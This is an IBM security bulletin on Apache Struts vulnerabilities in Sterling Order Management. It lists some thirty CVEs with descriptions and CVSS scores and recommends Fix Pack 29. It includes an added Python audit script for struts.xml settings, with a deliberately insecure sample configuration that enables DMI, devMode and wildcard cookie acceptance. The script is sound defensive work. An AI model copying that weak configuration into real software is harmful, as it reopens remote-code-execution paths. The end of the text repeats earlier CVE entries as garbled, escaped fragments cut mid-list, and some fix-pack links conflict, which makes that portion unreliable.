## Summary
IBM Sterling Order Management uses Apache Struts as part of its web application framework for creating Java EE web applications. We recommend upgrading to the latest supported version of Struts, which was released as part of the latest Fix Pack 29.
## Vulnerability Details
**CVEID:** [CVE-2011-1772](<https://vulners.com/cve/CVE-2011-1772>)
**DESCRIPTION:** Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by Xwork when generating the action name for error pages. If Dynamic Method Invocation is enabled, a remote attacker could exploit this vulnerability using the tag in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.
CVSS Base score: 2.6
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/67354](<https://exchange.xforce.ibmcloud.com/vulnerabilities/67354>) for the current score.
CVSS Vector: (AV:N/AC:H/Au:N/C:N/I:P/A:N)
**CVEID:** [CVE-2012-0838](<https://vulners.com/cve/CVE-2012-0838>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the evaluation of an OGNL expression during a conversion error. An attacker could exploit this vulnerability using invalid input to a field to modify run-time data and execute arbitrary code on the system.
CVSS Base score: 7.5
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/73690](<https://exchange.xforce.ibmcloud.com/vulnerabilities/73690>) for the current score.
CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)
**CVEID:** [CVE-2014-7809](<https://vulners.com/cve/CVE-2014-7809>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by predictable tokens. By sending a specially crafted request, an attacker could exploit this vulnerability to bypass cross-site request forgery security measures.
CVSS Base score: 4.3
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/98963](<https://exchange.xforce.ibmcloud.com/vulnerabilities/98963>) for the current score.
CVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)
**CVEID:** [CVE-2011-5057](<https://vulners.com/cve/CVE-2011-5057>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by the failure to block access to the session map by the org.apache.struts2.interceptor.SessionAware or org.apache.struts2.interceptor.RequestAware interfaces. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to modify the session map.
CVSS Base score: 5
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/71654](<https://exchange.xforce.ibmcloud.com/vulnerabilities/71654>) for the current score.
CVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N)
**CVEID:** [CVE-2012-4387](<https://vulners.com/cve/CVE-2012-4387>)
**DESCRIPTION:** Apache Struts is vulnerable to a denial of service, caused by an error when handling request parameters. A remote attacker could exploit this vulnerability using a specially-crafted parameter name containing an OGNL expression to consume all available CPU resources.
CVSS Base score: 5
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/78183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/78183>) for the current score.
CVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)
**CVEID:** [CVE-2012-1006](<https://vulners.com/cve/CVE-2012-1006>)
**DESCRIPTION:** Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the editPerson.action and struts2-rest-showcase/orders scripts. A remote attacker could exploit this vulnerability using the name, lastName or clientName parameter in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.
CVSS Base score: 4.3
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72888](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72888>) for the current score.
CVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)
**CVEID:** [CVE-2012-0392](<https://vulners.com/cve/CVE-2012-0392>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by the failure to properly restrict access to static methods by the CookieInterceptor class. An attacker could exploit this vulnerability to execute arbitrary commands on the system.
CVSS Base score: 7.5
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72088](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72088>) for the current score.
CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)
**CVEID:** [CVE-2014-0094](<https://vulners.com/cve/CVE-2014-0094>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in ParametersInterceptor. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server.
CVSS Base score: 5
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92205](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92205>) for the current score.
CVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N)
**CVEID:** [CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>)
**DESCRIPTION:** Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail.
CVSS Base score: 5.9
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)
**CVEID:** [CVE-2013-1965](<https://vulners.com/cve/CVE-2013-1965>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error in the Apache Struts Showcase App. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject and execute arbitrary code on the system.
CVSS Base score: 6.8
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85573](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85573>) for the current score.
CVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:P)
**CVEID:** [CVE-2014-0112](<https://vulners.com/cve/CVE-2014-0112>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to ParametersInterceptor and the failure to restrict access to the class parameter. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server to execute arbitrary code on the system.
CVSS Base score: 7.5
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92740](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92740>) for the current score.
CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)
**CVEID:** [CVE-2013-2134](<https://vulners.com/cve/CVE-2013-2134>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by a double evaluation error when evaluating parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system.
CVSS Base score: 7.5
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84762](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84762>) for the current score.
CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)
**CVEID:** [CVE-2016-3081](<https://vulners.com/cve/CVE-2016-3081>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the passing of a malicious expression when Dynamic Method Invocation is enabled. An attacker could exploit this vulnerability to execute arbitrary code on the system.
CVSS Base score: 5.6
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/112528](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112528>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L)
**CVEID:** [CVE-2014-0113](<https://vulners.com/cve/CVE-2014-0113>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to CookieInterceptor and the failure to restrict access to the getClass() method. An attacker could exploit this vulnerability using CookieInterceptor when configured to accept all cookies to manipulate the ClassLoader used by the application server to execute arbitrary code on the system.
CVSS Base score: 7.5
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92742](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92742>) for the current score.
CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)
**CVEID:** [CVE-2013-2135](<https://vulners.com/cve/CVE-2013-2135>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by a double evaluation error when evaluating parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system.
CVSS Base score: 7.5
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84763](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84763>) for the current score.
CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)
**CVEID:** [CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system.
CVSS Base score: 7.3
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)
**CVEID:** [CVE-2013-4316](<https://vulners.com/cve/CVE-2013-4316>)
**DESCRIPTION:** An unspecified error in Apache Struts related to the default enabling of Dynamic Method Invocation (DMI) could lead to remote code execution.
CVSS Base score: 10
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/87373](<https://exchange.xforce.ibmcloud.com/vulnerabilities/87373>) for the current score.
CVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)
**CVEID:** [CVE-2012-0391](<https://vulners.com/cve/CVE-2012-0391>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by the interpretation of parameter values as OGNL expressions by the ExceptionDelegator command. An attacker could exploit this vulnerability using a specially-crafted parameter to execute arbitrary commands on the system.
CVSS Base score: 7.5
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72229](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72229>) for the current score.
CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)
**CVEID:** [CVE-2012-0393](<https://vulners.com/cve/CVE-2012-0393>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to traverse directories on the system, caused by the improper validation of input by ParameterInterceptor prior to being used to create files. An attacker could send a specially-crafted URL request containing directory traversal sequences to create or overwrite arbitrary files on the system.
CVSS Base score: 5
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72089](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72089>) for the current score.
CVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N)
**CVEID:** [CVE-2012-4386](<https://vulners.com/cve/CVE-2012-4386>)
**DESCRIPTION:** Apache Struts is vulnerable to cross-site request forgery, caused by improper validation of the token name configuration parameter by the token handling mechanism. By persuading an authenticated user to visit a malicious Web site, a remote attacker could send a malformed HTTP request to perform unauthorized actions. An attacker could exploit this vulnerability to perform cross-site scripting attacks, Web cache poisoning, and other malicious activities.
CVSS Base score: 4.3
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/78182](<https://exchange.xforce.ibmcloud.com/vulnerabilities/78182>) for the current score.
CVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)
**CVEID:** [CVE-2016-4003](<https://vulners.com/cve/CVE-2016-4003>)
**DESCRIPTION:** Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the URLDecoder implementation. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.
CVSS Base score: 6.1
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/111514](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111514>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
**CVEID:** [CVE-2016-3093](<https://vulners.com/cve/CVE-2016-3093>)
**DESCRIPTION:** Apache Struts is vulnerable to a denial of service, caused by the improper implementation of the cache used to store method references by the OGNL expression language. An attacker could exploit this vulnerability to block access to a Web site.
CVSS Base score: 5.3
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/113686](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113686>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)
**CVEID:** [CVE-2013-4310](<https://vulners.com/cve/CVE-2013-4310>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in the action: parameter prefix. An attacker could exploit this vulnerability to gain unauthorized access to the system.
CVSS Base score: 5.8
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/87336](<https://exchange.xforce.ibmcloud.com/vulnerabilities/87336>) for the current score.
CVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:N)
**CVEID:** [CVE-2014-0116](<https://vulners.com/cve/CVE-2014-0116>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by the failure to properly restrict access to the getClass() method by the CookieInterceptor class. An attacker could exploit this vulnerability to manipulate the ClassLoader used by the application server.
CVSS Base score: 4.3
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/93024](<https://exchange.xforce.ibmcloud.com/vulnerabilities/93024>) for the current score.
CVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)
**CVEID:** [CVE-2010-1870](<https://vulners.com/cve/CVE-2010-1870>)
**DESCRIPTION:** XWork, as used in Apache Struts, FishEye and Crucible, could allow a remote attacker to bypass security restrictions, caused by an error in the ParameterInterceptor class. An attacker could exploit this vulnerability using specially-crafted OGNL (Object-Graph Navigation Language) expressions to modify server-side objects and possibly execute arbitrary commands on the system.
CVSS Base score: 7.5
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/60371](<https://exchange.xforce.ibmcloud.com/vulnerabilities/60371>) for the current score.
CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)
**CVEID:** [CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system.
CVSS Base score: 8.1
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)
**CVEID:** [CVE-2016-3082](<https://vulners.com/cve/CVE-2016-3082>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the use of XSLTResult to parse an arbitrary stylesheet. An attacker could exploit this vulnerability to inject and execute arbitrary code on the system.
CVSS Base score: 7.3
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/112527](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112527>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)
**CVEID:** [CVE-2016-4436](<https://vulners.com/cve/CVE-2016-4436>)
**DESCRIPTION:** An unspecified error in Apache Struts related to the method used to clean up the action name has an unknown impact and attack vector.
CVSS Base score: 5.3
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/114183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114183>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)
**CVEID:** [CVE-2013-2251](<https://vulners.com/cve/CVE-2013-2251>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating the action:, redirect:, and redirectAction: parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject and execute arbitrary commands on the system. Note: This vulnerability affects other products.
CVSS Base score: 7.5
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85756](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85756>) for the current score.
CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)
**CVEID:** [CVE-2017-12611](<https://vulners.com/cve/CVE-2017-12611>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the use of an unintentional expression in a Freemarker tag instead of string literals. An attacker could exploit this vulnerability to execute arbitrary code on the system.
CVSS Base score: 7.3
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/131603](<https://exchange.xforce.ibmcloud.com/vulnerabilities/131603>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)
**CVEID:** [CVE-2015-5209](<https://vulners.com/cve/CVE-2015-5209>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to gain unauthorized access to the system. An attacker could exploit this vulnerability using a special top-level object to manipulate internal settings and modify another user's session.
CVSS Base score: 9.1
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/106695](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106695>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)
**CVEID:** [CVE-2013-2115](<https://vulners.com/cve/CVE-2013-2115>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by an incomplete fix for an error related to the handling of the includeParams attribute. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system.
CVSS Base score: 7.5
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84543](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84543>) for the current score.
CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)
**CVEID:** [CVE-2013-1966](<https://vulners.com/cve/CVE-2013-1966>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by the improper handling of the includeParams attribute. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject OGNL code on the system.
CVSS Base score: 7.5
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84542](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84542>) for the current score.
CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)
**CVEID:** [CVE-2013-2248](<https://vulners.com/cve/CVE-2013-2248>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to conduct phishing attacks, caused by an open redirect vulnerability in the DefaultActionMapper class. An attacker could exploit this vulnerability using the redirect: and redirectAction: parameters in a specially-crafted URL to redirect a victim to arbitrary Web sites.
CVSS Base score: 4.3
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85755](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85755>) for the current score.
CVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)
**CVEID:** [CVE-2015-2992](<https://vulners.com/cve/CVE-2015-2992>)
**DESCRIPTION:** Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input when directly accessing JSP files. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.
CVSS Base score: 6.1
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/106172](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106172>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
**CVEID:** [CVE-2015-5169](<https://vulners.com/cve/CVE-2015-5169>)
**DESCRIPTION:** Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input when debug mode is enabled. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.
CVSS Base score: 6.1
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/105879](<https://exchange.xforce.ibmcloud.com/vulnerabilities/105879>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
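Several of the descriptions above depend on a configuration precondition: Dynamic Method Invocation enabled, debug mode enabled, or CookieInterceptor configured to accept all cookies. The following audit of a `struts.xml` extension file for those three settings is an added example, not IBM's or the Struts project's code. It assumes that "debug mode" means the `struts.devMode` constant and that CookieInterceptor is referenced under its `struts-default` name `cookie`; the sample file content is constructed.

```python
import xml.etree.ElementTree as ET

DMI = "struts.enable.DynamicMethodInvocation"
DEV_MODE = "struts.devMode"  # assumption: the bulletin's "debug mode" is this constant
COOKIE = "cookie"            # assumption: CookieInterceptor under its struts-default name

NOTES = {
    DMI: "Dynamic Method Invocation (CVE-2011-1772, CVE-2013-4316, CVE-2016-3081)",
    DEV_MODE: "debug mode (CVE-2015-5169)",
    COOKIE: "CookieInterceptor accepting all cookies (CVE-2014-0113)",
}


def audit_struts_xml(xml_text):
    """Return a list of (check_id, message) findings for one struts.xml document."""
    root = ET.fromstring(xml_text)
    constants = {
        c.get("name"): (c.get("value") or "").strip().lower()
        for c in root.iter("constant")
    }
    findings = []
    for name in (DMI, DEV_MODE):
        if constants.get(name) == "true":
            findings.append((name, "enabled: " + NOTES[name]))
    # An absent DMI constant is reported too: the bulletin cites DMI being
    # enabled by default (CVE-2013-4316), so "not set" does not mean "off".
    if DMI not in constants:
        findings.append((DMI, "not set in this file; the effective value comes "
                              "from another config source or the framework default"))
    for ref in root.iter("interceptor-ref"):
        if ref.get("name") != COOKIE:
            continue
        for param in ref.findall("param"):
            names = [n.strip() for n in (param.text or "").split(",")]
            if param.get("name") == "cookiesName" and "*" in names:
                findings.append((COOKIE, "cookiesName=*: " + NOTES[COOKIE]))
    return findings


# Constructed sample: a struts.xml with all three preconditions present.
WEAK_SAMPLE = """<!DOCTYPE struts PUBLIC
  "-//Apache Software Foundation//DTD Struts Configuration 2.3//EN"
  "http://struts.apache.org/dtds/struts-2.3.dtd">
<struts>
  <constant name="struts.enable.DynamicMethodInvocation" value="true"/>
  <constant name="struts.devMode" value="true"/>
  <package name="demo" extends="struts-default">
    <action name="order" class="example.OrderAction">
      <interceptor-ref name="cookie">
        <param name="cookiesName">*</param>
      </interceptor-ref>
      <result>/order.jsp</result>
    </action>
  </package>
</struts>"""

# Constructed sample: same file with both constants off and an explicit cookie list.
HARDENED_SAMPLE = (WEAK_SAMPLE
                   .replace('value="true"', 'value="false"')
                   .replace(">*<", ">theme,locale<"))

# Constructed sample: no constants at all, so DMI is left to the default.
UNSET_SAMPLE = '<struts><package name="demo" extends="struts-default"/></struts>'

if __name__ == "__main__":
    for label, text in (("weak", WEAK_SAMPLE), ("hardened", HARDENED_SAMPLE),
                        ("unset", UNSET_SAMPLE)):
        print(label)
        for check_id, message in audit_struts_xml(text):
            print("  ", check_id, "->", message)
```

The check reads one file at a time, so constants set in `struts.properties` or in another included XML file need the same review.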
## Affected Products and Versions
Affected Product(s)| Version(s)
---|---
IBM Sterling Order Management| 10.0
IBM Sterling Order Management| 9.5.x
## Remediation/Fixes
IBM strongly recommends addressing the vulnerability now by upgrading to the latest fix pack, which contains the upgraded version of Apache Struts. Please note that the fix pack only applies to IBM Sterling Order Management version 10; if you are running IBM Sterling Order Management version 9.5, a product upgrade must be completed first. IBM Sterling Order Management version 9.5 is end of support as of April 30, 2022.
Order Management installing Fix Pack 29 - <https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version#fp29> <https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version#fp30>
Fix Pack 29 download location - <https://www.ibm.com/support/fixcentral/swg/selectFixes?fixids=10.0.0.0-Sterling-SSFF-All-fp30-Installer&product=ibm%2FOther%20software%2FSterling%20Selling%20and%20Fulfillment%20Foundation&source=dbluesearch&mhsrc=ibmsearch_a&mhq=10.0.0.0-Sterling-SSFF-All-fp30-Installer%20&function=fixId&parent=ibm/Other%20software>
Creating & Extending Struts - <https://www.ibm.com/docs/en/order-management-sw/10.0?topic=cesf-creating-extending-struts-xml-file-in-web-ui-framework>
On-Premise release notes - <https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version>
Fix Central Link (**FP details URL**):
<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Selling+and+Fulfillment+Foundation&fixids=10.0.0.0-Sterling-SSFF-All-fp29-Installer&source=SAR>
## Workarounds and Mitigations
IBM strongly recommends addressing the vulnerability now by executing the above steps in product version 10.0. Version 9.5 is end of support as of April 30, 2022. If you need further clarification regarding 9.5 end of support, log4j and version 9.5, please contact IBM support.
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2014-0113](<https://vulners.com/cve/CVE-2014-0113>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to CookieInterceptor and the failure to restrict access to the getClass() method. An attacker could exploit this vulnerability using CookieInterceptor when configured to accept all cookies to manipulate the ClassLoader used by the application server to execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92742](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92742>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-2135](<https://vulners.com/cve/CVE-2013-2135>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by double evaluation error when evaluating parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84763](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84763>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. 
\nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2013-4316](<https://vulners.com/cve/CVE-2013-4316>) \n** DESCRIPTION: **An unspecified error in Apache Struts related to the default enabling of Dynamic Method Invocation (DMI) could lead to remote code execution. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/87373](<https://exchange.xforce.ibmcloud.com/vulnerabilities/87373>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n** CVEID: **[CVE-2012-0391](<https://vulners.com/cve/CVE-2012-0391>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by the interpretation of parameter values as OGNL expressions by the ExceptionDelegator command. An attacker could exploit this vulnerability using a specially-crafted parameter to execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72229](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72229>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2012-0393](<https://vulners.com/cve/CVE-2012-0393>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to traverse directories on the system, caused by the improper validation of input by ParameterInterceptor prior to being used to create files. An attacker could send a specially-crafted URL request containing directory traversal sequences to create or overwrite arbitrary files on the system. 
